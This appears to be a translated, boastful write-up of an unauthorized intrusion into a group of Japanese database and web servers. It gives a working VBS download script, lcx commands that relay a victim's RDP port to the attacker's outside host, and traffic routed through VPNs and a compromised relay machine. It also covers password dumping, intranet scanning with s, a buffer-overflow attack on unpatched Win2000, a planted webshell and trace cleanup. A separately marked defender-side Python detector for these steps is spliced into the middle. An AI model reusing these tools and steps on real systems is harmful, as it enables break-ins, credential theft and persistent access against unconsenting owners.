In this case, one penetration yielded control of an entire server group, N servers, so I wrote it up with a little vanity.
Opening:
The starting point is an injection point with sa privileges on an intranet host, plus a VBS download script, lcx, and port forwarding.
Reference snippet, down.vbs (takes two arguments: the URL, then the local file name to save as):
' down.vbs: fetch a URL with XMLHTTP and write the response bytes to a local file
iRemote = LCase(WScript.Arguments(0))   ' URL to download
iLocal  = LCase(WScript.Arguments(1))   ' local path to save to
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET", iRemote, 0            ' synchronous request
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3                           ' adModeReadWrite
sGet.Type = 1                           ' adTypeBinary
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile iLocal, 2               ' adSaveCreateOverWrite
Use: cscript down.vbs http://ip/lcx.exe (the file is saved under system32 by default)
This download script can be reused without exposing the address where I keep my tools. (Some download scripts have that address written into them, which is not ideal.)
A local connection to Japanese networks is slow, so I chained two VPNs and then went through a compromised host in Japan; the speed should not be bad. (ps: this is the role of the bots.)
Added a user. On the compromised relay host: lcx -listen 520 1982; on the target machine: lcx -slave myip 520 127.0.0.1 3389.
OK, connecting to 127.0.0.1:1982 from the terminal logs in successfully.
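A defender-side check for the two techniques in this section (a script host fetching a URL, and an lcx-style relay that exposes RDP to an outside host), added here as example code that is not part of the original write-up. The event records, host names and the 203.0.113.5 address are constructed, and the four-field record format is an assumption.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample process-creation records (not real logs). Assumed format:
# "host|user|image|command line", loosely modelled on Sysmon event 1 / 4688.
SAMPLE_EVENTS = """\
sql01|NT AUTHORITY\\SYSTEM|C:\\WINNT\\system32\\cscript.exe|cscript down.vbs http://203.0.113.5/lcx.exe lcx.exe
sql01|NT AUTHORITY\\SYSTEM|C:\\WINNT\\system32\\lcx.exe|lcx -slave 203.0.113.5 520 127.0.0.1 3389
ws07|CORP\\alice|C:\\WINNT\\system32\\cscript.exe|cscript logon.vbs
ws07|CORP\\alice|C:\\WINNT\\system32\\notepad.exe|notepad.exe report.txt
"""
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# lcx-style relay: "-slave <ip> <port> <ip> <port>"
SLAVE_RE = re.compile(r"-slave\s+(\S+)\s+(\d+)\s+(\S+)\s+(\d+)", re.IGNORECASE)
INTERNAL_NETS = [ip_network(n) for n in
                 ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(ip: str) -> bool:
    """True for loopback/RFC1918 addresses; anything unparsable counts as external."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)

def classify(record: str) -> list[str]:
    """Return detection labels for one record (empty list means nothing flagged)."""
    host, user, image, cmd = record.split("|", 3)
    labels = []
    exe = image.rsplit("\\", 1)[-1].lower()
    # Script host invoked with a URL on its command line: the down.vbs pattern.
    if exe in ("cscript.exe", "wscript.exe") and URL_RE.search(cmd):
        labels.append("script-host-download")
    m = SLAVE_RE.search(cmd)
    if m:
        a_ip, a_port, b_ip, b_port = m.groups()
        # RDP (3389) relayed between an internal address and an external one.
        if "3389" in (a_port, b_port) and is_internal(a_ip) != is_internal(b_ip):
            labels.append("rdp-relay-to-external-host")
    return labels

def scan(events: str) -> dict[int, list[str]]:
    """Map 1-based record number to its labels, for records that were flagged."""
    return {n: lab for n, rec in enumerate(events.splitlines(), 1)
            if (lab := classify(rec))}

if __name__ == "__main__":
    for n, labels in scan(SAMPLE_EVENTS).items():
        print(n, labels)
```

A hostname such as the page's "myip" placeholder does not parse as an address and is therefore treated as external, so a relay to it is still flagged.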
Middle game:
Win2000 system, MS SQL Server.
First, capture the system password and find the SQL password. Check some information, and check whether anyone else in the trade has left backdoors; clear them.
Analysed the password pattern: (number + machine name + number).
I'm not clear about the rest. Put a few basic tools in a hidden directory.
Ps: generally you have to clean up after getting in. It's best not to plant trojans: fast, but easy to expose.
Now, figuring out how to get web permissions. (Analyse the network topology.)
First look at the network neighbors:
Workgroup
C ** SQL2006
B **-DB
B *** TENDB
....
Obviously, they are all database servers.
Another workgroup is found at the top level:
Web-k. **. jp
C *** oo_db
...
Ah, these are database servers too.
ipconfig /all
192.168.10.18, only one intranet IP address.
OK: s tcp 192.168.10.1 192.168.10.254 80 20 /save
Use s to scan the internal network for hosts with port 80 open, with 20 threads, so it should be accurate.
Unfortunately the database servers are just database servers; there is no website on them.
I am wondering, where is the web server running?
Endgame:
After a while of carefully analysing the network topology, I finally found:
192.168.1.1-255: this range is the web server group.
Next, use s to scan that range. Matching against the Internet IP address, pick 192.168.1.19 as the starting target for the overflow. (Zombies like this antique Win2000 are missing a lot of patches, so the overflow works well.)
Very comfortable. Then drop a webshell in a remote corner of the web directory, clean up the traces and leave.
Ps: the screenshot was taken while overflowing another database server.